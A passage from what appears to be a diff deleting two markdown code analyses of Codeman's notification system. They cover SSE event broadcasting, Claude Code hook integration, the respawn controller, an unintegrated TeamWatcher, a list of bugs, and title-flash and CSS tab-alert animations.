- Has backpressure handling (`sendSSEPreformatted` tracks `backpressuredClients`)
|
||||
- Silently drops events on serialization failure (circular refs)
|
||||
- Cache invalidation is broad -- any `session:*` event clears caches
|
||||
|
||||
### 1.2 SSE Client Management (Line 547-564)
|
||||
|
||||
Clients connect at `GET /api/events`:
|
||||
- Immediately sent `init` event with lightweight state (no terminal buffers)
|
||||
- Tracked in `Set<FastifyReply>` (`this.sseClients`)
|
||||
- Dead client cleanup runs every 30s (`SSE_HEALTH_CHECK_INTERVAL`)
|
||||
- Max 100 SSE clients (`MAX_SSE_CLIENTS` from `map-limits.ts`)
|
||||
|
||||
### 1.3 Complete Catalog of Notification-Relevant Broadcasts
|
||||
|
||||
The server emits ~70 distinct SSE event types. Those that trigger frontend notifications are:
|
||||
|
||||
| SSE Event | Server Location | Frontend Notification? | Category |
|
||||
|-----------|----------------|----------------------|----------|
|
||||
| `hook:idle_prompt` | Line 3431 | Yes - warning | Hook |
|
||||
| `hook:permission_prompt` | Line 3431 | Yes - critical | Hook |
|
||||
| `hook:elicitation_dialog` | Line 3431 | Yes - critical | Hook |
|
||||
| `hook:stop` | Line 3431 | Yes - info | Hook |
|
||||
| `hook:teammate_idle` | Line 3431 | **NO** (no frontend handler) | Hook |
|
||||
| `hook:task_completed` | Line 3431 | **NO** (no frontend handler) | Hook |
|
||||
| `session:error` | Line 3921 | Yes - critical | Session |
|
||||
| `session:exit` | Line 3939 | Yes - critical (non-zero code) | Session |
|
||||
| `session:idle` | Line 3976 | Yes - warning (after stuck threshold) | Session |
|
||||
| `session:autoClear` | Line 4009 | Yes - info | Session |
|
||||
| `session:ralphCompletionDetected` | Line 4044 | Yes - warning | Ralph |
|
||||
| `session:circuitBreakerUpdate` | Line 4066 | Yes - critical (OPEN state) | Ralph |
|
||||
| `session:exitGateMet` | Line 4080 | Yes - warning | Ralph |
|
||||
| `respawn:blocked` | Line 4158 | Yes - critical | Respawn |
|
||||
| `respawn:autoAcceptSent` | Line 4177 | Yes - info | Respawn |
|
||||
|
||||
Events that update UI but do NOT trigger notifications:
|
||||
- `session:working` (line 3966) -- clears stuck timer and tab alerts
|
||||
- `session:completion` (line 3928) -- updates cost display
|
||||
- `session:updated` (many locations) -- tab/panel state updates
|
||||
- `respawn:stateChanged` (line 4143) -- banner update only
|
||||
- `respawn:cycleStarted` (line 4150) -- cycle counter update
|
||||
- `subagent:discovered` (line 458) -- auto-opens window, no notification
|
||||
- `subagent:completed` (line 464) -- no notification
|
||||
- `image:detected` (line 504) -- auto-opens popup, no notification
|
||||
- `transcript:*` events (lines 3575-3591) -- no frontend handlers for notifications
|
||||
|
||||
### 1.4 Terminal Data Batching
|
||||
|
||||
Terminal and output data use separate batching pipelines that bypass `broadcast()`:
|
||||
- `batchTerminalData()` (line 4668) -- adaptive 16-50ms batching for PTY output
|
||||
- `batchOutputData()` (line 4741) -- 50ms batching for parsed text output
|
||||
- Both flush through `broadcast('session:terminal', ...)` and `broadcast('session:output', ...)`
|
||||
|
||||
---
|
||||
|
||||
## 2. Hook Events System (`src/hooks-config.ts`)
|
||||
|
||||
### 2.1 Hook Configuration Generator (Lines 24-67)
|
||||
|
||||
The `generateHooksConfig()` function creates `.claude/settings.local.json` entries that make Claude Code POST to Codeman when hooks fire:
|
||||
|
||||
```typescript
|
||||
const curlCmd = (event: HookEventType) =>
|
||||
`HOOK_DATA=$(cat 2>/dev/null || echo '{}'); ` +
|
||||
`curl -s -X POST "$CODEMAN_API_URL/api/hook-event" ` +
|
||||
`-H 'Content-Type: application/json' ` +
|
||||
`-d "{\\"event\\":\\"${event}\\",\\"sessionId\\":\\"$CODEMAN_SESSION_ID\\",\\"data\\":$HOOK_DATA}" ` +
|
||||
`2>/dev/null || true`;
|
||||
```
|
||||
|
||||
Six hook types are configured:
|
||||
|
||||
| Hook Category | Matcher | Event Type |
|
||||
|--------------|---------|------------|
|
||||
| Notification | `idle_prompt` | `idle_prompt` |
|
||||
| Notification | `permission_prompt` | `permission_prompt` |
|
||||
| Notification | `elicitation_dialog` | `elicitation_dialog` |
|
||||
| Stop | (all stops) | `stop` |
|
||||
| TeammateIdle | (all) | `teammate_idle` |
|
||||
| TaskCompleted | (all) | `task_completed` |
|
||||
|
||||
### 2.2 Hook Event Flow
|
||||
|
||||
```
|
||||
Claude Code Hook Fires
|
||||
--> Shell command executes (curl)
|
||||
--> POST /api/hook-event with {event, sessionId, data}
|
||||
--> Zod validation (HookEventSchema, schemas.ts:79)
|
||||
--> Session lookup (must exist)
|
||||
--> Respawn controller signaling (elicitation/stop/idle_prompt only)
|
||||
--> Transcript watcher setup (if data.transcript_path present)
|
||||
--> Data sanitization (sanitizeHookData, server.ts:178)
|
||||
--> SSE broadcast as `hook:{eventType}`
|
||||
--> Run summary tracking (recordHookEvent)
|
||||
```
|
||||
|
||||
### 2.3 Data Sanitization (Lines 178-211)
|
||||
|
||||
The `sanitizeHookData()` function limits what gets broadcast:
|
||||
- Allowed keys: `hook_event_name`, `tool_name`, `tool_input`, `session_id`, `cwd`, `permission_mode`, `stop_hook_active`, `transcript_path`
|
||||
- `tool_input` objects are summarized (command truncated to 500 chars, only summary fields forwarded)
|
||||
- Total data size capped at `MAX_HOOK_DATA_SIZE` (line 135)
|
||||
|
||||
### 2.4 Environment Variables (Lines 70-101)
|
||||
|
||||
Two env vars are set per case directory via `updateCaseEnvVars()`:
|
||||
- `CODEMAN_API_URL` -- server URL (e.g., `http://localhost:3000`)
|
||||
- `CODEMAN_SESSION_ID` -- session identifier
|
||||
|
||||
These are resolved at runtime by the shell, so the hook config is static per case.
|
||||
|
||||
### 2.5 Hook Config Writing (Lines 107-129)
|
||||
|
||||
`writeHooksConfig()` merges hook config into existing `.claude/settings.local.json`, preserving other keys. Called during case creation (server.ts lines 2197, 2441).
|
||||
|
||||
---
|
||||
|
||||
## 3. Hook-to-Respawn Controller Integration (`src/web/server.ts`, Lines 3406-3418)
|
||||
|
||||
Three of the six hook types signal the respawn controller:
|
||||
|
||||
| Hook Event | Controller Method | Effect |
|
||||
|-----------|------------------|--------|
|
||||
| `elicitation_dialog` | `signalElicitation()` | Blocks auto-accept (prevents Enter press on question prompts) |
|
||||
| `stop` | `signalStopHook()` | Definitive idle signal; starts short confirmation timer, skips AI check |
|
||||
| `idle_prompt` | `signalIdlePrompt()` | Definitive 60s+ idle signal; cancels all detection timers, directly confirms idle |
|
||||
|
||||
**Not handled by respawn controller**: `teammate_idle`, `task_completed`, `permission_prompt`. The first two are team-related hooks that have no backend integration beyond being broadcast via SSE (and the frontend has no handlers either -- see Section 7).
|
||||
|
||||
---
|
||||
|
||||
## 4. Respawn Controller Events (`src/respawn-controller.ts`)
|
||||
|
||||
The `RespawnController` extends `EventEmitter` and emits many events that the server wires to SSE broadcasts (server.ts lines 4143-4271).
|
||||
|
||||
### 4.1 Notification-Triggering Events
|
||||
|
||||
| Controller Event | SSE Broadcast | Frontend Notification? |
|
||||
|-----------------|---------------|----------------------|
|
||||
| `respawnBlocked` | `respawn:blocked` | Yes - critical (reason: circuit_breaker, exit_signal, status_blocked, session_error, session_stopped, no_pty) |
|
||||
| `autoAcceptSent` | `respawn:autoAcceptSent` | Yes - info ("Plan Accepted") |
|
||||
|
||||
### 4.2 UI-Only Events (No Notification)
|
||||
|
||||
| Controller Event | SSE Broadcast | Frontend Action |
|
||||
|-----------------|---------------|----------------|
|
||||
| `stateChanged` | `respawn:stateChanged` | Banner state label update |
|
||||
| `respawnCycleStarted` | `respawn:cycleStarted` | Cycle counter update |
|
||||
| `respawnCycleCompleted` | `respawn:cycleCompleted` | (no explicit handler) |
|
||||
| `detectionUpdate` | `respawn:detectionUpdate` | Detection display update |
|
||||
| `stepSent` | `respawn:stepSent` | (no-op handler) |
|
||||
| `stepCompleted` | `respawn:stepCompleted` | (no handler) |
|
||||
| `aiCheckStarted/Completed/Failed` | `respawn:aiCheck*` | (no-op handlers) |
|
||||
| `aiCheckCooldown` | `respawn:aiCheckCooldown` | (no-op handler) |
|
||||
| `planCheckStarted/Completed/Failed` | `respawn:planCheck*` | (no handlers) |
|
||||
| `timerStarted/Cancelled/Completed` | `respawn:timer*` | Countdown timer UI |
|
||||
| `actionLog` | `respawn:actionLog` | Action log display |
|
||||
| `log` | `respawn:log` | Debug log |
|
||||
| `error` | `respawn:error` | (no handler) |
|
||||
|
||||
### 4.3 Respawn-to-Run-Summary Integration
|
||||
|
||||
The server wires respawn state changes into the run summary tracker (server.ts line 4143):
|
||||
```typescript
|
||||
this.broadcast('respawn:stateChanged', { sessionId, state, prevState });
|
||||
// Also records in run summary:
|
||||
const summaryTracker = this.runSummaryTrackers.get(sessionId);
|
||||
if (summaryTracker) summaryTracker.recordStateChange(state);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Team / Agent Notification Flow
|
||||
|
||||
### 5.1 SubagentWatcher (`src/subagent-watcher.ts`)
|
||||
|
||||
The SubagentWatcher emits events that the server wires to SSE broadcasts (server.ts lines 458-477):
|
||||
|
||||
```typescript
|
||||
discovered: (info) => this.broadcast('subagent:discovered', info),
|
||||
updated: (info) => this.broadcast('subagent:updated', info),
|
||||
toolCall: (data) => this.broadcast('subagent:tool_call', data),
|
||||
toolResult: (data) => this.broadcast('subagent:tool_result', data),
|
||||
progress: (data) => this.broadcast('subagent:progress', data),
|
||||
message: (data) => this.broadcast('subagent:message', data),
|
||||
completed: (info) => this.broadcast('subagent:completed', info),
|
||||
```
|
||||
|
||||
**None of these trigger frontend notifications.** The frontend auto-opens subagent windows on `subagent:discovered` (app.js line 2887), but the `NotificationManager` is not invoked.
|
||||
|
||||
### 5.2 TeamWatcher (`src/team-watcher.ts`)
|
||||
|
||||
**CRITICAL FINDING: TeamWatcher is completely unintegrated with the server.**
|
||||
|
||||
- The class is defined in `src/team-watcher.ts` and extends `EventEmitter`
|
||||
- It emits events: `teamCreated`, `teamUpdated`, `teamRemoved`, `taskUpdated`, `inboxMessage`
|
||||
- It is **never imported** in `server.ts` or any other file
|
||||
- The `hasActiveTeammates()` method (designed for idle detection) is never called
|
||||
- There is no SSE broadcast for any team event
|
||||
- The frontend has no SSE listeners for `team:*` events
|
||||
|
||||
The frontend does have team-related UI code (teammate badges, team task panel, teammate terminal windows at app.js lines 13057-13501), but this appears to be driven by polling APIs or subagent watcher integration rather than dedicated SSE events.
|
||||
|
||||
### 5.3 Team Hook Events (teammate_idle, task_completed)
|
||||
|
||||
These are accepted by the API endpoint (validated by `HookEventSchema`) and broadcast as `hook:teammate_idle` and `hook:task_completed` SSE events, but:
|
||||
- The **respawn controller ignores them** (only handles `elicitation_dialog`, `stop`, `idle_prompt`)
|
||||
- The **frontend has no SSE listeners** for `hook:teammate_idle` or `hook:task_completed`
|
||||
- They are recorded in the **run summary** via `recordHookEvent()` but otherwise silently dropped
|
||||
|
||||
---
|
||||
|
||||
## 6. Run Summary (`src/run-summary.ts`)
|
||||
|
||||
### 6.1 Overview
|
||||
|
||||
The RunSummaryTracker records a timeline of events per session for "what happened while I was away" views. It is a **recording system**, not a notification system -- it does not trigger any notifications itself.
|
||||
|
||||
### 6.2 Event Types Tracked
|
||||
|
||||
From `types.ts` (lines 1359-1375):
|
||||
```typescript
|
||||
type RunSummaryEventType =
|
||||
| 'session_started' | 'session_stopped'
|
||||
| 'respawn_cycle_started' | 'respawn_cycle_completed' | 'respawn_state_change'
|
||||
| 'error' | 'warning'
|
||||
| 'token_milestone' | 'auto_compact' | 'auto_clear'
|
||||
| 'idle_detected' | 'working_detected'
|
||||
| 'ralph_completion' | 'ai_check_result'
|
||||
| 'hook_event' | 'state_stuck';
|
||||
```
|
||||
|
||||
### 6.3 Integration Points with Notification System
|
||||
|
||||
The run summary and notification system are **parallel but independent**:
|
||||
- Both consume the same backend events (hooks, idle, working, errors)
|
||||
- Run summary records for historical review; notifications alert in real-time
|
||||
- There is no feedback loop between them (e.g., run summary does not trigger delayed notifications)
|
||||
|
||||
### 6.4 State Stuck Detection (Lines 402-421)
|
||||
|
||||
The RunSummaryTracker has its own state-stuck detection (10-minute threshold, checked every 60s) that records `state_stuck` events. This is separate from the frontend's idle-stuck notification (which uses `stuckThresholdMs`, default 10 minutes, triggered by `session:idle` events).
|
||||
|
||||
**Potential overlap**: Both the run summary and the frontend independently detect "stuck" states. The run summary records it; the frontend notifies. They could diverge if their thresholds or detection logic differ.
|
||||
|
||||
---
|
||||
|
||||
## 7. Types (`src/types.ts`)
|
||||
|
||||
### 7.1 Hook Event Types (Line 749)
|
||||
|
||||
```typescript
|
||||
type HookEventType = 'idle_prompt' | 'permission_prompt' | 'elicitation_dialog'
|
||||
| 'stop' | 'teammate_idle' | 'task_completed';
|
||||
```
|
||||
|
||||
### 7.2 Hook Event Request (Lines 754-761)
|
||||
|
||||
```typescript
|
||||
interface HookEventRequest {
|
||||
event: HookEventType;
|
||||
sessionId: string;
|
||||
data?: Record<string, unknown>;
|
||||
}
|
||||
```
|
||||
|
||||
### 7.3 Run Summary Types (Lines 1355-1470)
|
||||
|
||||
- `RunSummaryEventType` -- 16 event types
|
||||
- `RunSummaryEventSeverity` -- `'info' | 'warning' | 'error' | 'success'`
|
||||
- `RunSummaryEvent` -- `{id, timestamp, type, severity, title, details?, metadata?}`
|
||||
- `RunSummaryStats` -- aggregated statistics (cycles, tokens, time active/idle, etc.)
|
||||
- `RunSummary` -- complete summary `{sessionId, sessionName, startedAt, lastUpdatedAt, events, stats}`
|
||||
|
||||
### 7.4 Missing Notification Types
|
||||
|
||||
There is **no dedicated notification type** in the backend. The backend has no `Notification` interface or notification-specific data structures. All notification logic lives in the frontend `NotificationManager` class (`app.js` lines 859-1230).
|
||||
|
||||
---
|
||||
|
||||
## 8. Bugs and Issues
|
||||
|
||||
### 8.1 TeamWatcher Not Integrated (Critical Gap)
|
||||
|
||||
**File**: `src/team-watcher.ts` (entire file)
|
||||
**Issue**: TeamWatcher is defined but never instantiated or imported in the server. The `hasActiveTeammates()` method was designed for team-aware idle detection (preventing premature respawn when teammates are still working), but it is never called.
|
||||
|
||||
**Impact**:
|
||||
- The respawn controller has no awareness of active teammates
|
||||
- Team events (member join/leave, task updates, inbox messages) are never broadcast to clients
|
||||
- The frontend's team UI must rely on other mechanisms (likely API polling or subagent watcher)
|
||||
|
||||
### 8.2 `hook:teammate_idle` and `hook:task_completed` Are Dead Events
|
||||
|
||||
**File**: `src/web/server.ts` (line 3431), `src/web/public/app.js`
|
||||
**Issue**: These hook events are accepted by the API, validated, and broadcast via SSE, but:
|
||||
- The respawn controller does not handle them (line 3408-3418 -- only checks elicitation, stop, idle_prompt)
|
||||
- The frontend has no `addListener('hook:teammate_idle', ...)` or `addListener('hook:task_completed', ...)`
|
||||
- They are recorded in the run summary but otherwise have zero effect
|
||||
|
||||
**Impact**: When Claude Code fires TeammateIdle or TaskCompleted hooks, the data is broadcast into the void. No notification, no UI update, no respawn logic.
|
||||
|
||||
### 8.3 `respawn:error` Has No Frontend Handler
|
||||
|
||||
**File**: `src/web/server.ts` (line 4236), `src/web/public/app.js`
|
||||
**Issue**: The server broadcasts `respawn:error` events, but the frontend has no listener for this event. Respawn errors are silently ignored on the client side.
|
||||
|
||||
**Impact**: If the respawn controller encounters an error (e.g., PTY write failure), the user gets no notification.
|
||||
|
||||
### 8.4 `respawn:cycleCompleted` Has No Frontend Handler
|
||||
|
||||
**File**: `src/web/server.ts` (line 4154)
|
||||
**Issue**: `respawn:cycleCompleted` is broadcast but has no frontend listener. The cycle count is updated via `respawn:cycleStarted`, but completion is not acknowledged.
|
||||
|
||||
### 8.5 `respawn:stepCompleted` Has No Frontend Handler
|
||||
|
||||
**File**: `src/web/server.ts` (line 4169)
|
||||
**Issue**: Broadcast but not listened to in the frontend.
|
||||
|
||||
### 8.6 Image Detection Lacks Notification
|
||||
|
||||
**File**: `src/web/public/app.js` (line 3039)
|
||||
**Issue**: `image:detected` events auto-open a popup window but do not trigger the `NotificationManager`. If the user is on another tab, they get no notification that a screenshot or generated image was detected.
|
||||
|
||||
### 8.7 Subagent Discovery/Completion Lacks Notification (By Design?)
|
||||
|
||||
**File**: `src/web/public/app.js` (lines 2887, 2912+)
|
||||
**Issue**: Subagent events auto-open windows but do not trigger notifications. The notification preferences have `subagent_spawn` and `subagent_complete` event types defined (app.js line 906-907) with defaults of `enabled: false`, but no code actually calls `notificationManager.notify()` for these events.
|
||||
|
||||
**Impact**: The notification preferences UI shows toggle switches for subagent events, but they do nothing -- the notifications are never triggered regardless of the setting.
|
||||
|
||||
### 8.8 `session:autoCompact` Has No Notification
|
||||
|
||||
**File**: `src/web/public/app.js`
|
||||
**Issue**: `session:autoClear` triggers a notification (app.js line 2623), but `session:autoCompact` does not. Both are significant session events (context reset vs. context compaction). The `autoCompact` SSE event is handled (line 2633 area) but only shows a toast if it's the active session, with no `NotificationManager.notify()` call.
|
||||
|
||||
**Note**: After reviewing the code more carefully, `session:autoCompact` is not in the file at the lines I checked. It may be handled elsewhere or may genuinely be missing a notification.
|
||||
|
||||
### 8.9 Cache Invalidation Pattern Is Overly Broad
|
||||
|
||||
**File**: `src/web/server.ts` (line 4648)
|
||||
**Issue**: `if (event.startsWith('session:') || event === 'respawn:')` -- the `respawn:` check uses exact equality, but all respawn events are formatted as `respawn:stateChanged`, `respawn:blocked`, etc. The check `event === 'respawn:'` will never match. This means respawn events do NOT invalidate the cached state.
|
||||
|
||||
```typescript
|
||||
if (event.startsWith('session:') || event === 'respawn:') {
|
||||
```
|
||||
|
||||
Should likely be:
|
||||
```typescript
|
||||
if (event.startsWith('session:') || event.startsWith('respawn:')) {
|
||||
```
|
||||
|
||||
**Impact**: After respawn state changes, the cached `getLightSessionsState()` may serve stale data until a `session:*` event triggers invalidation. Since respawn status is included in session state (via `getSessionStateWithRespawn()`), subsequent API calls to `GET /api/sessions` or SSE reconnects could show outdated respawn info.
|
||||
|
||||
---
|
||||
|
||||
## 9. Missing Notification Paths
|
||||
|
||||
### 9.1 Events That SHOULD Notify But Don't
|
||||
|
||||
| Event | Current Behavior | Suggested Notification |
|
||||
|-------|-----------------|----------------------|
|
||||
| `hook:teammate_idle` | Broadcast, no handler | Warning: "Teammate idle, may need new task" |
|
||||
| `hook:task_completed` | Broadcast, no handler | Info: "Team task completed" |
|
||||
| `respawn:error` | Broadcast, no handler | Critical: "Respawn error: {message}" |
|
||||
| `image:detected` | Auto-opens popup | Info (when tab unfocused): "Screenshot captured" |
|
||||
| `subagent:discovered` | Auto-opens window | Info (if enabled): "New subagent spawned: {description}" |
|
||||
| `subagent:completed` | Updates panel | Info (if enabled): "Subagent completed: {description}" |
|
||||
| `respawn:cycleCompleted` | Broadcast, no handler | Info: "Respawn cycle #{n} completed" |
|
||||
|
||||
### 9.2 Team Events That Need SSE Broadcasting
|
||||
|
||||
Since TeamWatcher is not integrated, these events never reach clients:
|
||||
- Team created/updated/removed
|
||||
- Task status changes
|
||||
- New inbox messages
|
||||
- Teammate count changes
|
||||
|
||||
---
|
||||
|
||||
## 10. Architecture Diagram
|
||||
|
||||
```
|
||||
Claude Code Hooks
|
||||
|
|
||||
curl POST /api/hook-event
|
||||
|
|
||||
+-------------------+
|
||||
| server.ts |
|
||||
| (Fastify) |
|
||||
+-------------------+
|
||||
| | |
|
||||
Respawn | Broadcast | RunSummary
|
||||
Signal | via SSE | Record
|
||||
| | |
|
||||
+---------+ +---+---+ +--------+
|
||||
|RespawnCtrl| |SSE Bus| |Summary |
|
||||
| emits | | | |Tracker |
|
||||
| events | +---+---+ +--------+
|
||||
+---------+ |
|
||||
| |
|
||||
server.ts Connected
|
||||
wires to Browsers
|
||||
SSE via |
|
||||
broadcast() |
|
||||
+----+-----+
|
||||
| app.js |
|
||||
| Frontend |
|
||||
+----------+
|
||||
|
|
||||
+----------+-----------+
|
||||
| |
|
||||
NotificationManager Tab Alert System
|
||||
(4 layers) (pendingHooks)
|
||||
1. In-app drawer - action (critical)
|
||||
2. Tab title flash - idle (warning)
|
||||
3. Browser Notification API
|
||||
4. Audio alerts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 11. Summary of Key Files and Line References
|
||||
|
||||
| File | Lines | Purpose |
|
||||
|------|-------|---------|
|
||||
| `src/web/server.ts` | 4646-4663 | `broadcast()` method |
|
||||
| `src/web/server.ts` | 547-564 | SSE client setup |
|
||||
| `src/web/server.ts` | 3396-3440 | Hook event endpoint |
|
||||
| `src/web/server.ts` | 178-211 | `sanitizeHookData()` |
|
||||
| `src/web/server.ts` | 3900-4103 | Session event wiring |
|
||||
| `src/web/server.ts` | 4143-4271 | Respawn event wiring |
|
||||
| `src/web/server.ts` | 458-477 | Subagent event wiring |
|
||||
| `src/hooks-config.ts` | 24-67 | Hook config generator |
|
||||
| `src/hooks-config.ts` | 107-129 | Config file writer |
|
||||
| `src/types.ts` | 749 | `HookEventType` |
|
||||
| `src/types.ts` | 754-761 | `HookEventRequest` |
|
||||
| `src/types.ts` | 1359-1375 | `RunSummaryEventType` |
|
||||
| `src/team-watcher.ts` | 27-338 | TeamWatcher (unintegrated) |
|
||||
| `src/subagent-watcher.ts` | 217-1346 | SubagentWatcher events |
|
||||
| `src/respawn-controller.ts` | 467-476 | Event documentation |
|
||||
| `src/respawn-controller.ts` | 2469-2551 | Hook signal methods |
|
||||
| `src/respawn-controller.ts` | 2750-2842 | Respawn blocking logic |
|
||||
| `src/run-summary.ts` | 56-447 | RunSummaryTracker class |
|
||||
| `src/web/schemas.ts` | 79-83 | HookEventSchema |
|
||||
| `src/web/public/app.js` | 860-1038 | NotificationManager class |
|
||||
| `src/web/public/app.js` | 1445-1477 | Pending hooks state machine |
|
||||
| `src/web/public/app.js` | 2813-2883 | Hook event SSE handlers |
|
||||
| `src/web/public/app.js` | 2443-2613 | Respawn event SSE handlers |
|
||||
| `src/web/public/app.js` | 2335-2417 | Session lifecycle SSE handlers |
|
||||
@@ -1,549 +0,0 @@
|
||||
# Notification Blinking & Visual Alert System - Deep Dive
|
||||
|
||||
## Overview
|
||||
|
||||
Codeman implements a **4-layer notification system** managed by the `NotificationManager` class (app.js lines 860-1265). The layers are:
|
||||
|
||||
1. **In-app notification drawer** (Layer 1) - badge + list UI
|
||||
2. **Document title flashing** (Layer 2) - tab title blinks when hidden
|
||||
3. **Browser Web Notifications** (Layer 3) - OS-level popups
|
||||
4. **Audio alerts** (Layer 4) - Web Audio API beeps
|
||||
|
||||
In addition, there are **CSS-based tab alert animations** that are independent of NotificationManager and driven by the pending hooks state machine.
|
||||
|
||||
---
|
||||
|
||||
## 1. Document Title Blinking
|
||||
|
||||
### Location
|
||||
`src/web/public/app.js` lines 1082-1104
|
||||
|
||||
### Mechanism
|
||||
The title blink uses `setInterval` to toggle `document.title` between two states every 1500ms:
|
||||
|
||||
```js
|
||||
// Constants (line 14)
|
||||
const TITLE_FLASH_INTERVAL_MS = 1500;
|
||||
|
||||
// updateTabTitle() - line 1082
|
||||
updateTabTitle() {
|
||||
if (this.unreadCount > 0 && !this.isTabVisible) {
|
||||
if (!this.titleFlashInterval) {
|
||||
this.titleFlashInterval = setInterval(() => {
|
||||
this.titleFlashState = !this.titleFlashState;
|
||||
document.title = this.titleFlashState
|
||||
? `\u26A0\uFE0F (${this.unreadCount}) Codeman`
|
||||
: this.originalTitle;
|
||||
}, TITLE_FLASH_INTERVAL_MS);
|
||||
// Set immediately
|
||||
document.title = `\u26A0\uFE0F (${this.unreadCount}) Codeman`;
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
The title alternates between:
|
||||
- Warning emoji + unread count: `"(3) Codeman"`
|
||||
- Original title: `"Codeman"`
|
||||
|
||||
### What Triggers It
|
||||
Title flashing starts when `notify()` is called **while the tab is not visible** (`!this.isTabVisible`). The check is at lines 1026-1028:
|
||||
|
||||
```js
|
||||
if (!this.isTabVisible) {
|
||||
this.updateTabTitle();
|
||||
}
|
||||
```
|
||||
|
||||
Every event that calls `notificationManager.notify()` can trigger title blinking. This includes:
|
||||
- `session:error` - Session errors (critical)
|
||||
- `session:exit` - Unexpected exits with non-zero codes (critical)
|
||||
- `session:idle` - Stuck detection after threshold (warning)
|
||||
- `hook:idle_prompt` - Claude waiting for input (warning)
|
||||
- `hook:permission_prompt` - Tool approval needed (critical)
|
||||
- `hook:elicitation_dialog` - Claude asking a question (critical)
|
||||
- `hook:stop` - Response complete (info)
|
||||
- `respawn:blocked` - Respawn blocked (critical)
|
||||
- `respawn:autoAcceptSent` - Plan accepted (info)
|
||||
- `session:autoClear` - Auto-cleared context (info)
|
||||
- `session:ralphCompletionDetected` - Loop complete (warning)
|
||||
- `session:circuitBreakerUpdate` (when OPEN) - Critical
|
||||
- `session:exitGateMet` - Exit gate met (warning)
|
||||
- Various Ralph/fix-plan operations
|
||||
|
||||
### What Stops It
|
||||
Title flashing stops via `stopTitleFlash()` (lines 1097-1104):
|
||||
|
||||
```js
|
||||
stopTitleFlash() {
|
||||
if (this.titleFlashInterval) {
|
||||
clearInterval(this.titleFlashInterval);
|
||||
this.titleFlashInterval = null;
|
||||
this.titleFlashState = false;
|
||||
document.title = this.originalTitle;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Called from:
|
||||
1. **`onTabVisible()`** (line 1242) - When tab becomes visible again
|
||||
2. **`markAllRead()`** (line 1218) - When user marks all notifications read
|
||||
3. **`clearAll()`** (line 1226) - When user clears all notifications
|
||||
4. **`handleInit()` cleanup** (lines 3294-3298) - On SSE reconnect
|
||||
|
||||
### Interval Safety
|
||||
The interval guard (`if (!this.titleFlashInterval)`) at line 1084 prevents stacking - only one interval can exist at a time. New notifications while blinking update the `unreadCount` displayed but don't create additional intervals. This is **correct and safe**.
|
||||
|
||||
### Memory Leak Risk: LOW
|
||||
The interval is properly cleaned up in:
|
||||
- `onTabVisible()` - on every tab return
|
||||
- `handleInit()` - on SSE reconnect (lines 3294-3298)
|
||||
- `markAllRead()` and `clearAll()` - user actions
|
||||
|
||||
The `handleInit()` cleanup is particularly important because SSE reconnects reset all state. The explicit cleanup at lines 3294-3298 prevents orphaned intervals:
|
||||
|
||||
```js
|
||||
// Clear notification manager title flash interval to prevent memory leak
|
||||
if (this.notificationManager?.titleFlashInterval) {
|
||||
clearInterval(this.notificationManager.titleFlashInterval);
|
||||
this.notificationManager.titleFlashInterval = null;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Favicon Changes
|
||||
|
||||
### Current State: NO dynamic favicon changes
|
||||
|
||||
The favicon is defined as an **inline SVG data URI** in `index.html` line 9:
|
||||
|
||||
```html
|
||||
<link rel="icon" type="image/svg+xml" href="data:image/svg+xml,...">
|
||||
```
|
||||
|
||||
It shows a lightning bolt icon on a dark background. The favicon is **static** and never changes programmatically.
|
||||
|
||||
Browser notifications reference `/favicon.ico` as their icon (line 1130):
|
||||
```js
|
||||
const notif = new Notification(`Codeman: ${title}`, {
|
||||
body,
|
||||
tag,
|
||||
icon: '/favicon.ico',
|
||||
silent: true,
|
||||
});
|
||||
```
|
||||
|
||||
This is for the OS notification popup icon, not the browser tab favicon. There is no code that manipulates `link[rel="icon"]` or swaps the favicon for attention.
|
||||
|
||||
---
|
||||
|
||||
## 3. CSS Animations for Attention
|
||||
|
||||
### 3.1 Tab Alert Animations (styles.css lines 328-345)
|
||||
|
||||
Two CSS animation classes are applied to session tabs:
|
||||
|
||||
```css
|
||||
/* Red blinking tab - for action-required hooks */
|
||||
.session-tab.tab-alert-action {
|
||||
animation: tab-blink-red 2.5s ease-in-out infinite;
|
||||
}
|
||||
|
||||
/* Yellow blinking tab - for idle hooks */
|
||||
.session-tab.tab-alert-idle {
|
||||
animation: tab-blink-yellow 3.5s ease-in-out infinite;
|
||||
}
|
||||
|
||||
@keyframes tab-blink-red {
|
||||
0%, 100% { background: transparent; border-color: transparent; }
|
||||
50% { background: rgba(239, 68, 68, 0.12); border-color: var(--red); }
|
||||
}
|
||||
|
||||
@keyframes tab-blink-yellow {
|
||||
0%, 100% { background: transparent; border-color: transparent; }
|
||||
50% { background: rgba(234, 179, 8, 0.1); border-color: var(--yellow); }
|
||||
}
|
||||
```
|
||||
|
||||
- **Red blink (2.5s cycle)**: Permission prompts, elicitation dialogs - requires user action
|
||||
- **Yellow blink (3.5s cycle)**: Idle prompt - Claude waiting for input
|
||||
|
||||
These are **CSS-only infinite animations** with no JavaScript timer overhead. They are performant and have zero memory leak risk.
|
||||
|
||||
### 3.2 Tab Switch Glow (styles.css lines 241-251)
|
||||
|
||||
```css
|
||||
.session-tab.tab-glow {
|
||||
animation: tab-glow 0.35s ease-out forwards;
|
||||
}
|
||||
```
|
||||
|
||||
A one-shot green glow burst when switching tabs. Applied in `selectSession()` (app.js line 3985) and cleaned up via `animationend` event with `{ once: true }`:
|
||||
|
||||
```js
|
||||
activeTab.classList.add('tab-glow');
|
||||
activeTab.addEventListener('animationend', () => activeTab.classList.remove('tab-glow'), { once: true });
|
||||
```
|
||||
|
||||
This is **safe** - `{ once: true }` auto-removes the listener.
|
||||
|
||||
### 3.3 Notification Badge Pulse (styles.css lines 3978-4000)
|
||||
|
||||
```css
|
||||
.notification-badge {
|
||||
animation: notif-badge-pulse 2s ease-in-out infinite;
|
||||
}
|
||||
|
||||
@keyframes notif-badge-pulse {
|
||||
0%, 100% { transform: scale(1); }
|
||||
50% { transform: scale(1.15); }
|
||||
}
|
||||
```
|
||||
|
||||
The red notification count badge in the header bell icon pulses continuously when visible. Pure CSS, no memory concerns.
|
||||
|
||||
### 3.4 Status Dot Pulse (styles.css lines 261-265, 347-350)
|
||||
|
||||
```css
|
||||
.session-tab .tab-status.busy {
|
||||
background: var(--green);
|
||||
animation: pulse 1.5s infinite;
|
||||
will-change: opacity;
|
||||
}
|
